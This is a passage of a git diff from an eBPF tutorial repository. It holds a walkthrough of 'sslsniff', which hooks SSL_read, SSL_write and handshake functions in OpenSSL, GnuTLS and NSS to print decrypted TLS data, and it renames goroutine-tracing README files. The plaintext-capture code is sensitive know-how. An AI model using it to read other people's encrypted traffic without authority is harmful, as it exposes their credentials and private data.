success, `SSL_read_ex` stores the actual number of read bytes in `*readbytes`. - -### 2. Function SSL_write - -When we want to write data into an established SSL connection, we can use the `SSL_write` or `SSL_write_ex` functions. - -Function prototype: - -```c -int SSL_write_ex(SSL *s, const void *buf, size_t num, size_t *written); -int SSL_write(SSL *ssl, const void *buf, int num); -``` - -`SSL_write` and `SSL_write_ex` will write up to `num` bytes of data from the buffer `buf` into the specified `ssl` connection. Upon success, `SSL_write_ex` will store the actual number of written bytes in `*written`. - -## Writing eBPF Kernel Code - -In our example, we use eBPF to hook the `ssl_read` and `ssl_write` functions to perform custom actions when data is read from or written to an SSL connection. - -### Data Structures - -Firstly, we define a data structure `probe_SSL_data_t` to transfer data between kernel and user space: - -```c -#define MAX_BUF_SIZE 8192 -#define TASK_COMM_LEN 16 - -struct probe_SSL_data_t { - __u64 timestamp_ns; // Timestamp (nanoseconds) - __u64 delta_ns; // Function execution time - __u32 pid; // Process ID - __u32 tid; // Thread ID - __u32 uid; // User ID - __u32 len; // Length of read/write data - int buf_filled; // Whether buffer is filled completely - int rw; // Read or Write (0 for read, 1 for write) - char comm[TASK_COMM_LEN]; // Process name - __u8 buf[MAX_BUF_SIZE]; // Data buffer - int is_handshake; // Whether it's handshake data -}; -``` - -### Hook Functions - -Our goal is to hook into the `SSL_read` and `SSL_write` functions. We define a function `SSL_exit` to handle the return values of these two functions. This function determines whether to trace and collect data based on the current process and thread IDs. - -```c -static int SSL_exit(struct pt_regs *ctx, int rw) { - int ret = 0; - u32 zero = 0; - u64 pid_tgid = bpf_get_current_pid_tgid(); - u32 pid = pid_tgid >> 32; - u32 tid = (u32)pid_tgid; - u32 uid = bpf_get_current_uid_gid(); - u64 ts = bpf_ktime_get_ns(); - - if (!trace_allowed(uid, pid)) { - return 0; - } - - /* store arg info for later lookup */ - u64 *bufp = bpf_map_lookup_elem(&bufs, &tid); - if (bufp == 0) - return 0; - - u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); - if (!tsp) - return 0; - u64 delta_ns = ts - *tsp; - - int len = PT_REGS_RC(ctx); - if (len <= 0) // no data - return 0; - - struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); - if (!data) - return 0; - - data->timestamp_ns = ts; - data->delta_ns = delta_ns; - data->pid = pid; - data->tid = tid; - data->uid = uid; - data->len = (u32)len; - data->buf_filled = 0; - data->rw = rw; - data->is_handshake = false; - u32 buf_copy_size = min((size_t)MAX_BUF_SIZE, (size_t)len); - - bpf_get_current_comm(&data->comm, sizeof(data->comm)); - - if (bufp != 0) - ret = bpf_probe_read_user(&data->buf, buf_copy_size, (char *)*bufp); - - bpf_map_delete_elem(&bufs, &tid); - bpf_map_delete_elem(&start_ns, &tid); - - if (!ret) - data->buf_filled = 1; - else - buf_copy_size = 0; - - bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, - EVENT_SIZE(buf_copy_size)); - return 0; -} -``` - -The `rw` parameter here indicates whether it's a read or write operation. 0 represents read, and 1 represents write. - -#### Data Collection Process - -1. Obtain the ID of the current process and thread, along with the ID of the current user. -2. Use `trace_allowed` to determine if tracing is allowed for this process. -3. Get the start time to calculate the execution time of the function. -4. Attempt to retrieve relevant data from the `bufs` and `start_ns` maps. -5. If data retrieval is successful, create or locate a `probe_SSL_data_t` structure to populate the data. -6. Copy the data from user space to the buffer, ensuring it doesn't exceed the designated size. -7. Finally, send the data to user space. - -Note: We use two user-level return probes `uretprobe` to respectively hook the returns of `SSL_read` and `SSL_write`: - -```c -SEC("uretprobe/SSL_read") -int BPF_URETPROBE(probe_SSL_read_exit) { - return (SSL_exit(ctx, 0)); // 0 indicates read operation -} - -SEC("uretprobe/SSL_write") -int BPF_URETPROBE(probe_SSL_write_exit) { - return (SSL_exit(ctx, 1)); // 1 indicates write operation -} -``` - -### Hooking into the Handshake Process - -In SSL/TLS, the handshake is a special process used to establish a secure connection between a client and a server. To analyze this process, we hook into the `do_handshake` function to track the start and end of the handshake. - -#### Entering the Handshake - -We use a `uprobe` to set a probe for the `do_handshake` function: - -```c - -SEC("uprobe/do_handshake") -int BPF_UPROBE(probe_SSL_do_handshake_enter, void *ssl) { - u64 pid_tgid = bpf_get_current_pid_tgid(); - u32 pid = pid_tgid >> 32; - u32 tid = (u32)pid_tgid; - u64 ts = bpf_ktime_get_ns(); - u32 uid = bpf_get_current_uid_gid(); - - if (!trace_allowed(uid, pid)) { - return 0; - } - - /* store arg info for later lookup */ - bpf_map_update_elem(&start_ns, &tid, &ts, BPF_ANY); - return 0; -} -``` - -The main functionality of this code is as follows: - -1. Obtain the current `pid`, `tid`, `ts`, and `uid`. -2. Use `trace_allowed` to verify if the process is allowed to be traced. -3. Store the current timestamp in the `start_ns` map, which will be used to calculate the duration of the handshake process later. - -#### Exiting the Handshake - -Similarly, we've set a `uretprobe` for the return of `do_handshake`: - -```c -SEC("uretprobe/do_handshake") -int BPF_URETPROBE(handle_do_handshake_exit) { - // Code to execute upon exiting the do_handshake function. - return 0; -} -``` - -In this context, the `uretprobe` will execute the provided code when the `do_handshake` function exits. - -```c - -SEC("uretprobe/do_handshake") -int BPF_URETPROBE(probe_SSL_do_handshake_exit) { - u32 zero = 0; - u64 pid_tgid = bpf_get_current_pid_tgid(); - u32 pid = pid_tgid >> 32; - u32 tid = (u32)pid_tgid; - u32 uid = bpf_get_current_uid_gid(); - u64 ts = bpf_ktime_get_ns(); - int ret = 0; - - /* use kernel terminology here for tgid/pid: */ - u32 tgid = pid_tgid >> 32; - - /* store arg info for later lookup */ - if (!trace_allowed(tgid, pid)) { - return 0; - } - - u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); - if (tsp == 0) - return 0; - - ret = PT_REGS_RC(ctx); - if (ret <= 0) // handshake failed - return 0; - - struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); - if (!data) - return 0; - - data->timestamp_ns = ts; - data->delta_ns = ts - *tsp; - data->pid = pid; - data->tid = tid; - data->uid = uid; - data->len = ret; - data->buf_filled = 0; - data->rw = 2; - data->is_handshake = true; - bpf_get_current_comm(&data->comm, sizeof(data->comm)); - bpf_map_delete_elem(&start_ns, &tid); - - bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, - EVENT_SIZE(0)); - return 0; -} -``` - -Logic of this Function: - -1. Obtain the current `pid`, `tid`, `ts`, and `uid`. -2. Use `trace_allowed` to recheck if tracing is allowed. -3. Look up the timestamp in the `start_ns` map for calculating handshake duration. -4. Use `PT_REGS_RC(ctx)` to get the return value of `do_handshake` and determine if the handshake was successful. -5. Find or initialize the `probe_SSL_data_t` data structure associated with the current thread. -6. Update the data structure's fields, including timestamp, duration, process information, etc. -7. Use `bpf_perf_event_output` to send the data to user space. - -Our eBPF code not only tracks data transmission for `ssl_read` and `ssl_write` but also focuses on the SSL/TLS handshake process. This information is crucial for a deeper understanding and optimization of the performance of secure connections. - -Through these hook functions, we can obtain data regarding the success of the handshake, the time taken for the handshake, and related process information. This provides us with insights into the behavior of the system's SSL/TLS, enabling us to perform more in-depth analysis and optimization when necessary. - -## User-Space Assisted Code Analysis and Interpretation - -In the eBPF ecosystem, user-space and kernel-space code often work in collaboration. Kernel-space code is responsible for data collection, while user-space code manages, processes, and handles this data. In this section, we will explain how the above user-space code collaborates with eBPF to trace SSL/TLS interactions. - -### 1. Supported Library Attachment - -In the provided code snippet, based on the setting of the `env` environment variable, the program can choose to attach to three common encryption libraries (OpenSSL, GnuTLS, and NSS). This means that we can trace calls to multiple libraries within the same tool. - -To achieve this functionality, the `find_library_path` function is first used to determine the library's path. Then, depending on the library type, the corresponding `attach_` function is called to attach the eBPF program to the library function. - -```c - if (env.openssl) { - char *openssl_path = find_library_path("libssl.so"); - printf("OpenSSL path: %s\n", openssl_path); - attach_openssl(obj, openssl_path); - } - if (env.gnutls) { - char *gnutls_path = find_library_path("libgnutls.so"); - printf("GnuTLS path: %s\n", gnutls_path); - attach_gnutls(obj, gnutls_path); - } - if (env.nss) { - char *nss_path = find_library_path("libnspr4.so"); - printf("NSS path: %s\n", nss_path); - attach_nss(obj, nss_path); - } -``` - -This section primarily covers the attachment logic for the OpenSSL, GnuTLS, and NSS libraries. NSS is a set of security libraries designed for organizations, supporting the creation of secure client and server applications. Originally developed by Netscape, they are now maintained by Mozilla. The other two libraries have been introduced earlier and are not reiterated here. - -### 2. Detailed Attachment Logic - -The specific `attach` functions are as follows: - -```c -#define __ATTACH_UPROBE(skel, binary_path, sym_name, prog_name, is_retprobe) \ - do { \ - LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts, .func_name = #sym_name, \ - .retprobe = is_retprobe); \ - skel->links.prog_name = bpf_program__attach_uprobe_opts( \ - skel->progs.prog_name, env.pid, binary_path, 0, &uprobe_opts); \ - } while (false) - -int attach_openssl(struct sslsniff_bpf *skel, const char *lib) { - ATTACH_UPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_read_exit); - - if (env.latency && env.handshake) { - ATTACH_UPROBE_CHECKED(skel, lib, SSL_do_handshake, - probe_SSL_do_handshake_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, SSL_do_handshake, - probe_SSL_do_handshake_exit); - } - - return 0; -} - -int attach_gnutls(struct sslsniff_bpf *skel, const char *lib) { - ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_read_exit); - - return 0; -} - -int attach_nss(struct sslsniff_bpf *skel, const char *lib) { - ATTACH_UPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_read_exit); - ATTACH_UPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_read_exit); - - return 0; -} -``` - -We further examine the `attach_` function and can see that they both use the `ATTACH_UPROBE_CHECKED` and `ATTACH_URETPROBE_CHECKED` macros to implement specific mounting logic. These two macros are used respectively for setting uprobe (function entry) and uretprobe (function return). - -Considering that different libraries have different API function names (for example, OpenSSL uses `SSL_write`, while GnuTLS uses `gnutls_record_send`), we need to write a separate `attach_` function for each library. - -For instance, in the `attach_openssl` function, we set up probes for both `SSL_write` and `SSL_read`. If users also want to track handshake latency (`env.latency`) and the handshake process (`env.handshake`), we set up a probe for `SSL_do_handshake`. - -In the eBPF ecosystem, `perf_buffer` is an efficient mechanism used to transfer data from kernel space to user space. This is particularly useful for kernel-space eBPF programs as they can't directly interact with user space. With `perf_buffer`, we can collect data in kernel-space eBPF programs and then asynchronously read this data in user space. We use the `perf_buffer__poll` function to read data reported in kernel space, as shown below: - -```c -while (!exiting) { - err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); - if (err < 0 && err != -EINTR) { - warn("error polling perf buffer: %s\n", strerror(-err)); - goto cleanup; - } - err = 0; -} -``` - -Finally, in the `print_event` function, we print the data to standard output: - -```c -// Function to print the event from the perf buffer -void print_event(struct probe_SSL_data_t *event, const char *evt) { - ... - if (buf_size != 0) { - if (env.hexdump) { - // 2 characters for each byte + null terminator - char hex_data[MAX_BUF_SIZE * 2 + 1] = {0}; - buf_to_hex((uint8_t *)buf, buf_size, hex_data); - - printf("\n%s\n", s_mark); - for (size_t i = 0; i < strlen(hex_data); i += 32) { - printf("%.32s\n", hex_data + i); - } - printf("%s\n\n", e_mark); - } else { - printf("\n%s\n%s\n%s\n\n", s_mark, buf, e_mark); - } - } -} -``` - -You can find the complete source code here: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff) - -## Compilation and Execution - -To start using `sslsniff`, you need to first compile it: - -```sh -make -``` - -Once done, follow these steps: - -### **Start sslsniff** - -In a terminal, execute the following command to start `sslsniff`: - -```sh -sudo ./sslsniff -``` - -### **Execute CURL command** - -In another terminal, execute: - -```console -curl https://example.com -``` - -Under normal circumstances, you will see output similar to the following: - -```html - - - - Example Domain - ... - -
- ... -
- - -``` - -### **sslsniff Output** - -After executing the `curl` command, `sslsniff` will display the following content: - -```txt - READ/RECV 0.132786160 curl 47458 1256 - ----- DATA ----- - - ... -
-

Example Domain

- ... -
- - - - ----- END DATA ----- -``` - -**Note**: The displayed HTML content may vary depending on the specific content of the `example.com` page. - -### Displaying Latency and Handshake Process - -To view latency and handshake process, execute the following command: - -```console -$ sudo ./sslsniff -l --handshake -OpenSSL path: /lib/x86_64-linux-gnu/libssl.so.3 -GnuTLS path: /lib/x86_64-linux-gnu/libgnutls.so.30 -NSS path: /lib/x86_64-linux-gnu/libnspr4.so -FUNC TIME(s) COMM PID LEN LAT(ms) -HANDSHAKE 0.000000000 curl 6460 1 1.384 WRITE/SEND 0.000115400 curl 6460 24 0.014 -``` - -### Hexadecimal Output - -To display data in hexadecimal format, execute the following command: - -```console -$ sudo ./sslsniff --hexdump -WRITE/SEND 0.000000000 curl 16104 24 ------ DATA ----- -505249202a20485454502f322e300d0a -0d0a534d0d0a0d0a ------ END DATA ----- - -... -``` - -## Summary - -eBPF is a very powerful technology that can help us gain deeper insights into how a system works. This tutorial is a simple example demonstrating how to use eBPF to monitor SSL/TLS communication. If you're interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and tutorial website at . - -References: - -- -- -- -- -- - -> The original link of this article: diff --git a/src/31-goroutine/README.md b/src/31-goroutine/README.md index b59004e..02e0cde 100644 --- a/src/31-goroutine/README.md +++ b/src/31-goroutine/README.md @@ -1,31 +1,31 @@ -# eBPF 实践教程:使用 eBPF 跟踪 Go 协程状态 +# eBPF Practical Tutorial: Using eBPF to Trace Go Routine States -Go 是 Google 创建的一种广受欢迎的编程语言,以其强大的并发模型而著称。Go 语言的一个重要特点是协程(goroutine)的使用——这些协程是轻量级、由 Go 运行时管理的线程,使得编写并发程序变得非常简单。然而,在实时环境中理解和跟踪这些协程的执行状态,尤其是在调试复杂系统时,可能会面临很大的挑战。 +Go, the popular programming language created by Google, is known for its powerful concurrency model. One of the key features that makes Go stand out is the use of goroutines—lightweight, managed threads that make it easy to write concurrent programs. However, understanding and tracing the execution states of these goroutines in real time can be challenging, especially when debugging complex systems. -这时我们可以利用 eBPF(扩展伯克利包过滤器)技术。eBPF 最初设计用于网络数据包过滤,但随着时间的推移,eBPF 已经发展成为一个强大的工具,用于跟踪和监控系统行为。通过使用 eBPF,我们可以深入到内核,收集有关 Go 程序运行时行为的数据,包括协程的状态。本文将探讨如何使用 eBPF 跟踪 Go 程序中的协程状态转换。 +Enter eBPF (Extended Berkeley Packet Filter), a technology originally designed for network packet filtering, but which has since evolved into a powerful tool for tracing and monitoring system behavior. By leveraging eBPF, we can tap into the kernel and gather insights about the runtime behavior of Go programs, including the states of goroutines. This blog post explores how to use eBPF to trace the state transitions of goroutines in a Go program. -## 背景:协程与 eBPF +## Background: Goroutines and eBPF -### 协程 +### Goroutines -协程是 Go 语言的核心特性之一,它提供了一种简单而高效的并发处理方式。与传统的线程不同,协程由 Go 运行时管理,而不是由操作系统管理,因此更加轻量化。协程可以在以下几种状态之间进行转换: +Goroutines are a core feature of Go, providing a simple and efficient way to handle concurrency. Unlike traditional threads, goroutines are managed by the Go runtime rather than the operating system, making them much more lightweight. Goroutines can switch states, such as: -- **RUNNABLE(可运行)**:协程已准备好运行。 -- **RUNNING(运行中)**:协程正在执行中。 -- **WAITING(等待)**:协程正在等待某个事件(如 I/O 或定时器)。 -- **DEAD(终止)**:协程执行完毕并已终止。 +- **RUNNABLE**: The goroutine is ready to run. +- **RUNNING**: The goroutine is currently executing. +- **WAITING**: The goroutine is waiting for some event (e.g., I/O, timers). +- **DEAD**: The goroutine has finished executing and is terminated. -理解这些状态以及协程之间的状态转换对于诊断性能问题、确保 Go 程序的高效运行至关重要。 +Understanding these states and how goroutines transition between them is crucial for diagnosing performance issues and ensuring that your Go programs are running efficiently. ### eBPF -eBPF 是一种强大的技术,它允许开发人员在不修改内核源代码或加载内核模块的情况下,在 Linux 内核中运行自定义程序。eBPF 最初用于数据包过滤,但现在已扩展为一种多功能工具,广泛应用于性能监控、安全和调试。 +eBPF is a powerful technology that allows developers to run custom programs inside the Linux kernel without changing the kernel source code or loading kernel modules. Initially designed for packet filtering, eBPF has grown into a versatile tool used for performance monitoring, security, and debugging. -通过编写 eBPF 程序,开发人员可以跟踪各种系统事件,包括系统调用、网络事件和进程执行。在本文中,我们将重点介绍如何使用 eBPF 跟踪 Go 程序中协程的状态转换。 +By writing eBPF programs, developers can trace various system events, including system calls, network events, and process execution. In this blog, we'll focus on how eBPF can be used to trace the state transitions of goroutines in a Go program. -## eBPF 内核代码 +## The eBPF Kernel Code -现在,让我们深入探讨实现该跟踪功能的 eBPF 内核代码。 +Let's dive into the eBPF kernel code that makes this tracing possible. ```c #include @@ -64,30 +64,30 @@ int uprobe_runtime_casgstatus(struct pt_regs *ctx) { char LICENSE[] SEC("license") = "GPL"; ``` -1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 -2. **GOID_OFFSET**:`goid` 字段的偏移量被硬编码为 `0x98`,这是特定于所跟踪的 Go 版本和程序的。此偏移量在不同的 Go 版本或程序中可能有所不同。 -3. **环形缓冲区映射**:定义了一个 BPF 环形缓冲区映射,用于存储协程的执行数据。这个缓冲区允许内核高效地将信息传递到用户空间。 -4. **Uprobe**:该 eBPF 程序的核心是一个附加到 Go 程序中 `runtime.casgstatus` 函数的 uprobe(用户级探针)。该函数负责改变协程的状态,因此非常适合用来拦截和跟踪状态转换。 -5. **读取协程 ID**:`bpf_probe_read_user` 函数从用户空间内存中读取协程 ID(`goid`),使用的是预定义的偏移量。 -6. **提交数据**:如果成功读取了协程 ID,则数据会与进程 ID、线程组 ID 以及协程的新状态一起存储在环形缓冲区中。随后,这些数据会提交到用户空间以供分析。 +1. **Header Files**: The code begins by including necessary header files, such as `vmlinux.h`, which provides kernel definitions, and `bpf_helpers.h`, which offers helper functions for eBPF programs. +2. **GOID_OFFSET**: The offset of the `goid` field is hardcoded to `0x98`, which is specific to the Go version and the program being traced. This offset may vary between different Go versions or programs. +3. **Ring Buffer Map**: A BPF ring buffer map is defined to store the goroutine execution data. This buffer allows the kernel to pass information to user space efficiently. +4. **Uprobe**: The core of this eBPF program is an uprobes (user-level probe) attached to the `runtime.casgstatus` function in the Go program. This function is responsible for changing the state of a goroutine, making it an ideal place to intercept and trace state transitions. +5. **Reading Goroutine ID**: The `bpf_probe_read_user` function reads the goroutine ID (`goid`) from the user space memory, using the predefined offset. +6. **Submitting Data**: If the goroutine ID is successfully read, the data is stored in the ring buffer along with the process ID, thread group ID, and the new state of the goroutine. This data is then submitted to the user space for analysis. -## 运行程序 +## Running the Program -要运行此跟踪程序,请按照以下步骤操作: +To run this tracing program, follow these steps: -1. **编译 eBPF 代码**:使用类似 `ecc`(eBPF 编译集合)这样的编译器编译 eBPF 程序,并生成一个可以由 eBPF 加载器加载的包。 +1. **Compile the eBPF Code**: Compile the eBPF program using a compiler like `ecc` (eBPF Compiler Collection) and generate a package that can be loaded by an eBPF loader. ```bash ecc goroutine.bpf.c goroutine.h ``` -2. **运行 eBPF 程序**:使用 eBPF 加载器运行编译后的 eBPF 程序。 +2. **Run the eBPF Program**: Use an eBPF loader to run the compiled eBPF program. ```bash ecli-rs run package.json ``` -3. **输出**:程序将输出协程的状态转换及其 `goid`、`pid` 和 `tgid`。以下是一个示例输出: +3. **Output**: The program will output the state transitions of goroutines along with their `goid`, `pid`, and `tgid`. Here’s an example of the output: ```console TIME STATE GOID PID TGID @@ -97,16 +97,16 @@ char LICENSE[] SEC("license") = "GPL"; 21:00:47 WAITING(4) 2 2542847 2542844 ``` -完整代码可以在 找到。 +You can find the complete code in -如果你想了解更多关于 eBPF 的知识和实践,你可以访问我们的教程代码库 或网站 获取更多示例和完整教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. -内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是基于 LLVM JIT/AOT 的用户模式 eBPF 运行时,它可以在用户模式下运行 eBPF 程序,并且在处理 `uprobe` 时比内核模式 eBPF 更快。 +`Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode, compatible with kernel mode eBPF and can be faster for `uprobe`. -### 结论 +### Conclusion -使用 eBPF 跟踪协程状态可以深入了解 Go 程序的执行情况,尤其是在传统调试工具可能无法胜任的生产环境中。通过利用 eBPF,开发人员可以监控和诊断性能问题,确保 Go 应用程序高效运行。 +Tracing goroutine states using eBPF provides deep insights into the execution of Go programs, especially in production environments where traditional debugging tools may fall short. By leveraging eBPF, developers can monitor and diagnose performance issues, ensuring their Go applications run efficiently. -请注意,本 eBPF 程序中使用的偏移量是特定于所跟踪的 Go 版本和程序的。随着 Go 的发展,这些偏移量可能会发生变化,需要对 eBPF 代码进行更新。 +Keep in mind that the offsets used in this eBPF program are specific to the Go version and the program being traced. As Go evolves, these offsets may change, requiring updates to the eBPF code. -在未来的探索中,我们可以将这种方法扩展到跟踪 Go 程序或其他语言的其他方面,展示 eBPF 在现代软件开发中的多功能性和强大作用。 +In future explorations, we can extend this approach to trace other aspects of Go programs or even other languages, demonstrating the versatility and power of eBPF in modern software development. diff --git a/src/31-goroutine/README.zh.md b/src/31-goroutine/README.zh.md new file mode 100644 index 0000000..b59004e --- /dev/null +++ b/src/31-goroutine/README.zh.md @@ -0,0 +1,112 @@ +# eBPF 实践教程:使用 eBPF 跟踪 Go 协程状态 + +Go 是 Google 创建的一种广受欢迎的编程语言,以其强大的并发模型而著称。Go 语言的一个重要特点是协程(goroutine)的使用——这些协程是轻量级、由 Go 运行时管理的线程,使得编写并发程序变得非常简单。然而,在实时环境中理解和跟踪这些协程的执行状态,尤其是在调试复杂系统时,可能会面临很大的挑战。 + +这时我们可以利用 eBPF(扩展伯克利包过滤器)技术。eBPF 最初设计用于网络数据包过滤,但随着时间的推移,eBPF 已经发展成为一个强大的工具,用于跟踪和监控系统行为。通过使用 eBPF,我们可以深入到内核,收集有关 Go 程序运行时行为的数据,包括协程的状态。本文将探讨如何使用 eBPF 跟踪 Go 程序中的协程状态转换。 + +## 背景:协程与 eBPF + +### 协程 + +协程是 Go 语言的核心特性之一,它提供了一种简单而高效的并发处理方式。与传统的线程不同,协程由 Go 运行时管理,而不是由操作系统管理,因此更加轻量化。协程可以在以下几种状态之间进行转换: + +- **RUNNABLE(可运行)**:协程已准备好运行。 +- **RUNNING(运行中)**:协程正在执行中。 +- **WAITING(等待)**:协程正在等待某个事件(如 I/O 或定时器)。 +- **DEAD(终止)**:协程执行完毕并已终止。 + +理解这些状态以及协程之间的状态转换对于诊断性能问题、确保 Go 程序的高效运行至关重要。 + +### eBPF + +eBPF 是一种强大的技术,它允许开发人员在不修改内核源代码或加载内核模块的情况下,在 Linux 内核中运行自定义程序。eBPF 最初用于数据包过滤,但现在已扩展为一种多功能工具,广泛应用于性能监控、安全和调试。 + +通过编写 eBPF 程序,开发人员可以跟踪各种系统事件,包括系统调用、网络事件和进程执行。在本文中,我们将重点介绍如何使用 eBPF 跟踪 Go 程序中协程的状态转换。 + +## eBPF 内核代码 + +现在,让我们深入探讨实现该跟踪功能的 eBPF 内核代码。 + +```c +#include +#include "goroutine.h" +#include +#include +#include + +#define GOID_OFFSET 0x98 + +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +SEC("uprobe/./go-server-http/main:runtime.casgstatus") +int uprobe_runtime_casgstatus(struct pt_regs *ctx) { + int newval = ctx->cx; + void *gp = ctx->ax; + struct goroutine_execute_data *data; + u64 goid; + if (bpf_probe_read_user(&goid, sizeof(goid), gp + GOID_OFFSET) == 0) { + data = bpf_ringbuf_reserve(&rb, sizeof(*data), 0); + if (data) { + u64 pid_tgid = bpf_get_current_pid_tgid(); + data->pid = pid_tgid; + data->tgid = pid_tgid >> 32; + data->goid = goid; + data->state = newval; + bpf_ringbuf_submit(data, 0); + } + } + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 +2. **GOID_OFFSET**:`goid` 字段的偏移量被硬编码为 `0x98`,这是特定于所跟踪的 Go 版本和程序的。此偏移量在不同的 Go 版本或程序中可能有所不同。 +3. **环形缓冲区映射**:定义了一个 BPF 环形缓冲区映射,用于存储协程的执行数据。这个缓冲区允许内核高效地将信息传递到用户空间。 +4. **Uprobe**:该 eBPF 程序的核心是一个附加到 Go 程序中 `runtime.casgstatus` 函数的 uprobe(用户级探针)。该函数负责改变协程的状态,因此非常适合用来拦截和跟踪状态转换。 +5. **读取协程 ID**:`bpf_probe_read_user` 函数从用户空间内存中读取协程 ID(`goid`),使用的是预定义的偏移量。 +6. **提交数据**:如果成功读取了协程 ID,则数据会与进程 ID、线程组 ID 以及协程的新状态一起存储在环形缓冲区中。随后,这些数据会提交到用户空间以供分析。 + +## 运行程序 + +要运行此跟踪程序,请按照以下步骤操作: + +1. **编译 eBPF 代码**:使用类似 `ecc`(eBPF 编译集合)这样的编译器编译 eBPF 程序,并生成一个可以由 eBPF 加载器加载的包。 + + ```bash + ecc goroutine.bpf.c goroutine.h + ``` + +2. **运行 eBPF 程序**:使用 eBPF 加载器运行编译后的 eBPF 程序。 + + ```bash + ecli-rs run package.json + ``` + +3. **输出**:程序将输出协程的状态转换及其 `goid`、`pid` 和 `tgid`。以下是一个示例输出: + + ```console + TIME STATE GOID PID TGID + 21:00:47 DEAD(6) 0 2542844 2542844 + 21:00:47 RUNNABLE(1) 0 2542844 2542844 + 21:00:47 RUNNING(2) 1 2542844 2542844 + 21:00:47 WAITING(4) 2 2542847 2542844 + ``` + +完整代码可以在 找到。 + +如果你想了解更多关于 eBPF 的知识和实践,你可以访问我们的教程代码库 或网站 获取更多示例和完整教程。 + +内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是基于 LLVM JIT/AOT 的用户模式 eBPF 运行时,它可以在用户模式下运行 eBPF 程序,并且在处理 `uprobe` 时比内核模式 eBPF 更快。 + +### 结论 + +使用 eBPF 跟踪协程状态可以深入了解 Go 程序的执行情况,尤其是在传统调试工具可能无法胜任的生产环境中。通过利用 eBPF,开发人员可以监控和诊断性能问题,确保 Go 应用程序高效运行。 + +请注意,本 eBPF 程序中使用的偏移量是特定于所跟踪的 Go 版本和程序的。随着 Go 的发展,这些偏移量可能会发生变化,需要对 eBPF 代码进行更新。 + +在未来的探索中,我们可以将这种方法扩展到跟踪 Go 程序或其他语言的其他方面,展示 eBPF 在现代软件开发中的多功能性和强大作用。 diff --git a/src/31-goroutine/README_en.md b/src/31-goroutine/README_en.md deleted file mode 100644 index 02e0cde..0000000 --- a/src/31-goroutine/README_en.md +++ /dev/null @@ -1,112 +0,0 @@ -# eBPF Practical Tutorial: Using eBPF to Trace Go Routine States - -Go, the popular programming language created by Google, is known for its powerful concurrency model. One of the key features that makes Go stand out is the use of goroutines—lightweight, managed threads that make it easy to write concurrent programs. However, understanding and tracing the execution states of these goroutines in real time can be challenging, especially when debugging complex systems. - -Enter eBPF (Extended Berkeley Packet Filter), a technology originally designed for network packet filtering, but which has since evolved into a powerful tool for tracing and monitoring system behavior. By leveraging eBPF, we can tap into the kernel and gather insights about the runtime behavior of Go programs, including the states of goroutines. This blog post explores how to use eBPF to trace the state transitions of goroutines in a Go program. - -## Background: Goroutines and eBPF - -### Goroutines - -Goroutines are a core feature of Go, providing a simple and efficient way to handle concurrency. Unlike traditional threads, goroutines are managed by the Go runtime rather than the operating system, making them much more lightweight. Goroutines can switch states, such as: - -- **RUNNABLE**: The goroutine is ready to run. -- **RUNNING**: The goroutine is currently executing. -- **WAITING**: The goroutine is waiting for some event (e.g., I/O, timers). -- **DEAD**: The goroutine has finished executing and is terminated. - -Understanding these states and how goroutines transition between them is crucial for diagnosing performance issues and ensuring that your Go programs are running efficiently. - -### eBPF - -eBPF is a powerful technology that allows developers to run custom programs inside the Linux kernel without changing the kernel source code or loading kernel modules. Initially designed for packet filtering, eBPF has grown into a versatile tool used for performance monitoring, security, and debugging. - -By writing eBPF programs, developers can trace various system events, 